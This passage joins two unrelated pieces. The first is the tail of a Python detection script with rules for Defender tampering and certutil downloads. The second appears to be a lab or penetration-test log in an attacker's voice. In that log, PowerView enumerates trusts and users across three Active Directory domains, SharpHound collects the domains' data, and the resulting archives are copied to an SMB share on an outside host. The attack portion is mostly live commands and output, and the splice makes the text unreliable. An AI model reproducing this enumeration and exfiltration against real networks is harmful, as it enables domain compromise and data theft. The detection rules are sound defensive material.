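        if re.search(r"\bSet-MpPreference\b", cmd, re.I):
            switches = DEFENDER_SWITCH.findall(cmd)
            if switches:
                return ("defender-tamper", ",".join(switches))
        # certutil is only interesting here when used as a downloader.
        if (re.search(r"\bcertutil(\.exe)?\s", cmd, re.I)
                and re.search(r"[-/]urlcache\b", cmd, re.I)):
            url = URL.search(cmd)
            if url:
                return ("certutil-download", url.group(0))
    return None


def triage(events):
    """Run every event through check_event and collect the hits in order."""
    findings = []
    for ev in events:
        hit = check_event(ev)
        if hit:
            findings.append({"host": ev["host"], "rule": hit[0], "detail": hit[1]})
    return findings


def correlate(findings, min_rules=2):
    """Hosts where several distinct rules fired: the chain, not a lone event."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_rules}


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["host"]:10} {h["rule"]:20} {h["detail"]}')
    print("escalate:", correlate(hits))
```

Any one of these rules alone is noisy; the combination on a single host, especially a domain controller, is what warrants escalation.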

PowerView Enum:

PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1
PS C:\\Users\\Administrator\\Desktop> **Get-ForestTrust**
Get-ForestTrust

TopLevelNames            : {comply.com}
ExcludedTopLevelNames    : {}
TrustedDomainInformation : {ops.comply.com, comply.com}
SourceName               : complyedge.com
TargetName               : comply.com
TrustType                : Forest
TrustDirection           : **Bidirectional**

PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust**
Get-DomainTrust

SourceName      : complyedge.com
TargetName      : comply.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : **Bidirectional**
WhenCreated     : 7/15/2020 8:57:12 PM
WhenChanged     : 7/31/2022 8:19:00 AM

PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain comply.com**
Get-DomainTrust -Domain comply.com

SourceName      : comply.com
TargetName      : ops.comply.com
**TrustType       : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 7/15/2020 8:42:49 PM
WhenChanged     : 7/31/2022 8:19:15 AM

SourceName      : comply.com
TargetName      : complyedge.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 7/15/2020 8:57:11 PM
WhenChanged     : 7/31/2022 8:19:00 AM

PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain ops.comply.com**
Get-DomainTrust -Domain ops.comply.com

SourceName      : ops.comply.com
TargetName      : comply.com
**TrustType       : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 7/15/2020 8:42:49 PM
WhenChanged     : 7/31/2022 8:19:15 AM

PS C:\\Users\\Administrator\\Desktop> **Get-DomainTrust -Domain complyedge.com**
Get-DomainTrust -Domain complyedge.com

SourceName      : complyedge.com
TargetName      : comply.com
**TrustType       : WINDOWS_ACTIVE_DIRECTORY**
TrustAttributes : FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 7/15/2020 8:57:12 PM
WhenChanged     : 7/31/2022 8:19:00 AM

SharpHound information gathering:

c:\\Users\\Administrator\\Desktop>SharpHound.exe
SharpHound.exe
2022-07-31T02:52:20.8028751-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T02:52:20.8184980-07:00|INFORMATION|Initializing SharpHound at 2:52 AM on 7/31/2022
2022-07-31T02:52:21.1309994-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T02:52:21.2559915-07:00|INFORMATION|Beginning LDAP search for complyedge.com
2022-07-31T02:52:21.2872416-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T02:52:21.2872416-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T02:52:51.9278758-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2022-07-31T02:53:08.0372483-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T02:53:08.0684897-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T02:53:08.2247454-07:00|INFORMATION|Status: 102 objects finished (+102 2.217391)/s -- Using 58 MB RAM
2022-07-31T02:53:08.2247454-07:00|INFORMATION|Enumeration finished in 00:00:46.9789627
2022-07-31T02:53:08.3341209-07:00|INFORMATION|SharpHound Enumeration Completed at 2:53 AM on 7/31/2022! Happy Graphing!

c:\\Users\\Administrator\\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D04B-1DA6

 Directory of c:\\Users\\Administrator\\Desktop

07/31/2022  02:53 AM    <DIR>          .
07/31/2022  02:53 AM    <DIR>          ..
07/31/2022  02:53 AM            11,568 20220731025307_BloodHound.zip
07/31/2022  02:49 AM           791,196 PowerView.ps1
07/15/2020  02:22 PM                32 proof.txt
07/31/2022  02:48 AM           908,288 SharpHound.exe
07/31/2022  02:53 AM             9,073 ZjI3OWFlNTEtYTg4ZS00NzNjLWI0NzItN2Y3MTIxNmU3YjM0.bin
               5 File(s)      1,720,157 bytes
               2 Dir(s)   4,546,998,272 bytes free

c:\\Users\\Administrator\\Desktop>**net use v: \\\\192.168.49.64\\share share /u:share**
net use v: \\\\192.168.49.64\\share share /u:share
The command completed successfully.

c:\\Users\\Administrator\\Desktop>**copy 20220731025307_BloodHound.zip v:\\20220731025307_BloodHound.zip**
copy 20220731025307_BloodHound.zip v:\\20220731025307_BloodHound.zip
        1 file(s) copied.
c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain ops.comply.com**
SharpHound.exe --collectionmethods All --Domain ops.comply.com
2022-07-31T03:01:48.5997557-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:01:48.5997557-07:00|INFORMATION|Initializing SharpHound at 3:01 AM on 7/31/2022
2022-07-31T03:01:49.4122475-07:00|INFORMATION|Loaded cache with stats: 61 ID to type mappings.
 61 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-07-31T03:01:49.4278620-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:01:49.6622514-07:00|INFORMATION|Beginning LDAP search for ops.comply.com
2022-07-31T03:01:49.7247378-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:01:49.7403819-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:02:20.1310316-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2022-07-31T03:02:36.6466153-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:02:36.6778614-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:02:36.8341157-07:00|INFORMATION|Status: 101 objects finished (+101 2.148936)/s -- Using 58 MB RAM
2022-07-31T03:02:36.8341157-07:00|INFORMATION|Enumeration finished in 00:00:47.1637222
2022-07-31T03:02:36.9122476-07:00|INFORMATION|SharpHound Enumeration Completed at 3:02 AM on 7/31/2022! Happy Graphing!

c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain comply.com**
SharpHound.exe --collectionmethods All --Domain comply.com
2022-07-31T03:03:28.5684989-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:03:28.5684989-07:00|INFORMATION|Initializing SharpHound at 3:03 AM on 7/31/2022
2022-07-31T03:03:28.8810013-07:00|INFORMATION|Loaded cache with stats: 127 ID to type mappings.
 128 name to SID mappings.
 0 machine sid mappings.
 7 sid to domain mappings.
 0 global catalog mappings.
2022-07-31T03:03:28.8966775-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:03:29.1622521-07:00|INFORMATION|Beginning LDAP search for comply.com
2022-07-31T03:03:29.1935076-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:03:29.1935076-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:04:00.1153802-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-07-31T03:04:13.1466116-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:04:13.1778768-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:04:13.3341331-07:00|INFORMATION|Status: 94 objects finished (+94 2.136364)/s -- Using 58 MB RAM
2022-07-31T03:04:13.3341331-07:00|INFORMATION|Enumeration finished in 00:00:44.1841588
2022-07-31T03:04:13.4278684-07:00|INFORMATION|SharpHound Enumeration Completed at 3:04 AM on 7/31/2022! Happy Graphing!

c:\\Users\\Administrator\\Desktop>**SharpHound.exe --collectionmethods All --Domain complyedge.com**
SharpHound.exe --collectionmethods All --Domain complyedge.com
2022-07-31T03:08:18.0997513-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:08:18.0997513-07:00|INFORMATION|Initializing SharpHound at 3:08 AM on 7/31/2022
2022-07-31T03:08:18.5216184-07:00|INFORMATION|Loaded cache with stats: 178 ID to type mappings.
 180 name to SID mappings.
 0 machine sid mappings.
 7 sid to domain mappings.
 0 global catalog mappings.
2022-07-31T03:08:18.5216184-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-31T03:08:18.6466179-07:00|INFORMATION|Beginning LDAP search for complyedge.com
2022-07-31T03:08:18.6622478-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-31T03:08:18.6622478-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-31T03:08:48.7247488-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 39 MB RAM
2022-07-31T03:09:03.0528853-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-31T03:09:03.0841220-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-31T03:09:03.2403714-07:00|INFORMATION|Status: 102 objects finished (+102 2.318182)/s -- Using 54 MB RAM
2022-07-31T03:09:03.2403714-07:00|INFORMATION|Enumeration finished in 00:00:44.6019701
2022-07-31T03:09:03.3341197-07:00|INFORMATION|SharpHound Enumeration Completed at 3:09 AM on 7/31/2022! Happy Graphing!

c:\\Users\\Administrator\\Desktop>**copy 20220731030236_BloodHound.zip v:\\20220731030236_BloodHound.zip**
copy 20220731030236_BloodHound.zip v:\\20220731030236_BloodHound.zip
        1 file(s) copied.

c:\\Users\\Administrator\\Desktop>**copy 20220731030412_BloodHound.zip v:\\20220731030412_BloodHound.zip**
copy 20220731030412_BloodHound.zip v:\\20220731030412_BloodHound.zip
        1 file(s) copied.

c:\\Users\\Administrator\\Desktop>**copy 20220731030902_BloodHound.zip v:\\20220731030902_BloodHound.zip**
copy 20220731030902_BloodHound.zip v:\\20220731030902_BloodHound.zip
        1 file(s) copied.

PowerView enumeration of the users in each domain:

PS C:\\Users\\Administrator\\Desktop> Import-Module .\\PowerView.ps1
Import-Module .\\PowerView.ps1

PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -domain ops.comply.com**
Get-DomainUser -domain ops.comply.com

logoncount             : 44
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 7/31/2022 1:04:06 AM
name                   : Administrator
objectsid              : S-1-5-21-2032401531-514583578-4118054891-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 7/31/2022 8:04:06 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 3667857b-d2e0-45ea-ac5c-4b48a43586cf
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:58:48 PM, 7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=ops,DC=comply,DC=com, CN=Domain 
                         Admins,CN=Users,DC=ops,DC=comply,DC=com, CN=Administrators,CN=Builtin,DC=ops,DC=comply,DC=com}
lastlogon              : 7/31/2022 1:04:07 AM
badpasswordtime        : 9/21/2020 5:40:22 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:51:52 AM
usnchanged             : 69689

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=ops,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-2032401531-514583578-4118054891-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:42:49 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 517d1f2a-3a11-4b76-8d64-238f18f5dcc3
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:43:38 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=ops,DC=comply,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:42:49 PM
countrycode            : 0
primarygroupid         : 514
iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=ops,DC=comply,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-2032401531-514583578-4118054891-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:58:48 PM
instancetype                  : 4
usncreated                    : 12300
objectguid                    : 387a313b-0a95-45b2-8e7a-c0a21ebdae6e
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata         : {7/15/2020 8:58:48 PM, 7/15/2020 8:43:38 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=ops,DC=comply,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:43:38 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:43:38 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 13044

logoncount            : 16
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Pete
lastlogontimestamp    : 7/31/2022 2:38:53 AM
userprincipalname     : [email protected]
name                  : Pete
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname        : pete
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Pete
whenchanged           : 7/31/2022 9:38:53 AM
instancetype          : 4
usncreated            : 13078
objectguid            : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname             : Pete
memberof              : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon             : 7/31/2022 2:38:53 AM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 9:18:26 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 2:18:26 PM
usnchanged            : 69942

logoncount            : 4
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Nina
lastlogontimestamp    : 7/15/2020 11:49:19 PM
userprincipalname     : [email protected]
name                  : Nina
objectsid             : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname        : nina
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Nina
whenchanged           : 7/16/2020 6:49:19 AM
instancetype          : 4
usncreated            : 13717
objectguid            : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname             : Nina
memberof              : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon             : 7/15/2020 11:51:58 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/16/2020 6:48:28 AM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 11:48:28 PM
usnchanged            : 13726

PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -Domain complyedge.com**
Get-DomainUser -Domain complyedge.com

logoncount             : 28
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=complyedge,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 7/31/2022 1:03:50 AM
name                   : Administrator
objectsid              : S-1-5-21-1416213050-106196312-571527550-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 7/31/2022 8:03:50 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 82c88f7e-8039-42cc-8f3e-eb56230de90b
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata  : {7/15/2020 8:43:20 PM, 7/15/2020 8:43:20 PM, 7/15/2020 8:28:10 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=complyedge,DC=com, CN=Domain 
                         Admins,CN=Users,DC=complyedge,DC=com, CN=Enterprise Admins,CN=Users,DC=complyedge,DC=com, 
                         CN=Schema Admins,CN=Users,DC=complyedge,DC=com...}
lastlogon              : 7/31/2022 1:03:52 AM
badpasswordtime        : 12/8/2020 2:47:31 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:26:45 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:53:07 AM
usnchanged             : 86071

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=complyedge,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-1416213050-106196312-571527550-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:26:45 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 75307c5e-f3c6-4695-872c-03a154017c6f
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata  : {7/15/2020 8:28:10 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=complyedge,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:26:45 PM
countrycode            : 0
primarygroupid         : 514
iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=complyedge,DC=com
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
showinadvancedviewonly        : True
objectsid                     : S-1-5-21-1416213050-106196312-571527550-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/15/2020 8:43:20 PM
instancetype                  : 4
usncreated                    : 12324
objectguid                    : bdfd3294-0b6f-4601-8306-d616156936db
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata         : {7/15/2020 8:43:20 PM, 7/15/2020 8:28:10 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname          : kadmin/changepw
memberof                      : CN=Denied RODC Password Replication Group,CN=Users,DC=complyedge,DC=com
lastlogon                     : 12/31/1600 4:00:00 PM
badpasswordtime               : 12/31/1600 4:00:00 PM
badpwdcount                   : 0
useraccountcontrol            : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated                   : 7/15/2020 8:28:10 PM
countrycode                   : 0
primarygroupid                : 513
pwdlastset                    : 7/15/2020 1:28:10 PM
msds-supportedencryptiontypes : 0
usnchanged                    : 12821

logoncount            : 65
badpasswordtime       : 7/16/2020 7:47:49 AM
distinguishedname     : CN=Pete,OU=CEAdmins,OU=CEUsers,DC=complyedge,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Pete
lastlogontimestamp    : 7/31/2022 1:05:00 AM
userprincipalname     : [email protected]
name                  : Pete
objectsid             : S-1-5-21-1416213050-106196312-571527550-1103
samaccountname        : pete
admincount            : 1
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Pete
whenchanged           : 7/31/2022 8:05:00 AM
instancetype          : 4
usncreated            : 12784
objectguid            : 9ebf2f73-f14f-47d8-a24b-e26882242ee5
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : {7/15/2020 8:43:20 PM, 1/1/1601 12:00:00 AM}
givenname             : Pete
memberof              : CN=Domain Admins,CN=Users,DC=complyedge,DC=com
lastlogon             : 7/31/2022 3:05:00 AM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 8:42:05 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 1:42:05 PM
usnchanged            : 86099

logoncount            : 0
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=sshd,CN=Users,DC=complyedge,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : sshd
name                  : sshd
objectsid             : S-1-5-21-1416213050-106196312-571527550-1106
samaccountname        : sshd
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : sshd
whenchanged           : 7/15/2020 10:35:45 PM
instancetype          : 4
usncreated            : 12877
objectguid            : 315c9b39-440f-44aa-81b4-46043cac1b44
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
lastlogon             : 12/31/1600 4:00:00 PM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/15/2020 10:35:45 PM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/15/2020 3:35:45 PM
usnchanged            : 12880

logoncount            : 7
badpasswordtime       : 12/31/1600 4:00:00 PM
distinguishedname     : CN=Jim,OU=CEAdmins,OU=CEUsers,DC=complyedge,DC=com
objectclass           : {top, person, organizationalPerson, user}
displayname           : Jim
lastlogontimestamp    : 8/2/2020 10:42:36 AM
userprincipalname     : [email protected]
name                  : Jim
objectsid             : S-1-5-21-1416213050-106196312-571527550-1107
samaccountname        : jim
codepage              : 0
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
cn                    : Jim
whenchanged           : 8/2/2020 5:42:36 PM
instancetype          : 4
usncreated            : 12925
objectguid            : 6eeed88b-133e-4ab0-9687-e46845393226
lastlogoff            : 12/31/1600 4:00:00 PM
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=complyedge,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname             : Jim
lastlogon             : 8/2/2020 10:50:14 AM
badpwdcount           : 0
useraccountcontrol    : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated           : 7/16/2020 7:07:31 AM
countrycode           : 0
primarygroupid        : 513
pwdlastset            : 7/16/2020 12:07:32 AM
usnchanged            : 24624

PS C:\\Users\\Administrator\\Desktop> **Get-DomainUser -domain comply.com**
Get-DomainUser -domain comply.com

logoncount             : 50
iscriticalsystemobject : True
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 7/31/2022 1:03:53 AM
name                   : Administrator
objectsid              : S-1-5-21-1135011135-3178090508-3151492220-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
cn                     : Administrator
whenchanged            : 7/31/2022 8:03:53 AM
instancetype           : 4
usncreated             : 8196
objectguid             : 208616bc-47bb-42fc-931f-a5ea021c82b6
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:40:57 PM, 7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=comply,DC=com, CN=Domain 
                         Admins,CN=Users,DC=comply,DC=com, CN=Enterprise Admins,CN=Users,DC=comply,DC=com, CN=Schema 
                         Admins,CN=Users,DC=comply,DC=com...}
lastlogon              : 7/31/2022 1:03:54 AM
badpasswordtime        : 11/6/2020 4:44:48 AM
badpwdcount            : 0
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:24:22 PM
countrycode            : 0
primarygroupid         : 513
pwdlastset             : 8/2/2020 10:52:21 AM
usnchanged             : 69689

pwdlastset             : 12/31/1600 4:00:00 PM
logoncount             : 0
badpasswordtime        : 12/31/1600 4:00:00 PM
description            : Built-in account for guest access to the computer/domain
distinguishedname      : CN=Guest,CN=Users,DC=comply,DC=com
objectclass            : {top, person, organizationalPerson, user}
name                   : Guest
objectsid              : S-1-5-21-1135011135-3178090508-3151492220-501
samaccountname         : Guest
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : NEVER
cn                     : Guest
whenchanged            : 7/15/2020 8:24:22 PM
instancetype           : 4
usncreated             : 8197
objectguid             : 7b53e4be-388c-4d02-9848-da6302ad67bb
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata  : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
memberof               : CN=Guests,CN=Builtin,DC=comply,DC=com
lastlogon              : 12/31/1600 4:00:00 PM
badpwdcount            : 0
useraccountcontrol     : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated            : 7/15/2020 8:24:22 PM
countrycode            : 0
primarygroupid         : 514
iscriticalsystemobject : True
usnchanged             : 8197

logoncount                    : 0
iscriticalsystemobject        : True
description                   : Key Distribution Center Service Account
